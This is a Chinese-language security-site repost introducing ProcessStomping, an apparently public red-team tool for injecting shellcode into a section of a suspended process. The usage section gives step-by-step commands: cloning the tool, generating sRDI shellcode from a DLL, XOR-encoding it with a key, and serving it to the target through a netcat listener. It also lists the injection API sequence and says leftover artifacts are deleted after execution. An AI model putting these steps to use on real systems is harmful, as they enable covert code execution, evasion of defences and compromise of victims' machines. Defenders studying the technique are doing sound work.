如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

admin 2024年2月13日20:33:12评论13 views字数 1592阅读5分18秒阅读模式

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

 关于ProcessStomping 

ProcessStomping是一款功能强大的Shellcode代码执行工具,该工具允许广大研究人员在目标可执行程序的指定字段部分执行Shellcode代码。

ProcessStomping实际上是Process Overwriting项目的一个升级版本,并且能够向目标应用程序的指定字段部分写入Shellcode Payload,而不是直接将整个PE Payload写入到目标进程的整个地址空间。

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

 工具运行机制 

下面给出的是ProcessStomping技术的主要运行步骤:

1、CreateProcess:给CREATE_SUSPENDED(0x00000004)设置Process Creation标记,以挂起目标进程的主线程;

2、WriteProcessMemory:用于向目标进程字段写入每一个恶意Shellcode;

3、SetThreadContext:用于将入口点指向一个新的代码字段(写入了Shellcode的字段);

4、ResumeThread:恢复线程执行;

下图显示的是ProcessStomping如何向目标应用程序的RWX字段写入Shellcode:

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

 工具安装 

由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/naksyn/ProcessStomping.git

(向右滑动,查看更多)

 工具使用 

选择好你的目标进程,然后修改ProcessStomping.cpp中相应的全局变量。

然后编译sRDI项目,确保偏移量足够允许你跳转到生成的sRDI Shellcode代码块,然后运行下列命令更新sRDI工具:

cd ProcessStompingcd sRDI-masterpython .libPythonEncodeBlobs.py .

根据需要生成一个Reflective-Loaderless DLL Payload,然后生成sRDI Shellcode代码块:

python .libPythonConvertToShellcode.py -b -f "changethedefault" .noRLx86.dll

(向右滑动,查看更多)

接下来,工具会使用一个键值对异或计算生成的Shellcode代码块,并通过一个简单的socket下载到目标设备上:

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

(向右滑动,查看更多)

通过socket连接发送经过异或计算的Shellcode代码块:

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

(向右滑动,查看更多)

sRDI代码块和其他非必要组件将会在Shellcode成功执行之后被删除。

 工具运行截图 

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

 工具使用演示 

演示视频:

https://private-user-images.githubusercontent.com/59816245/283995906-8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50.mp4?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDUyM

 项目地址 

ProcessStomping

https://github.com/naksyn/ProcessStomping

原文始发于微信公众号(FreeBuf):如何使用ProcessStomping在可执行程序的字段部分执行Shellcode

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月13日20:33:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何使用ProcessStomping在可执行程序的字段部分执行Shellcodehttps://cn-sec.com/archives/2490530.html

发表评论

匿名网友 填写信息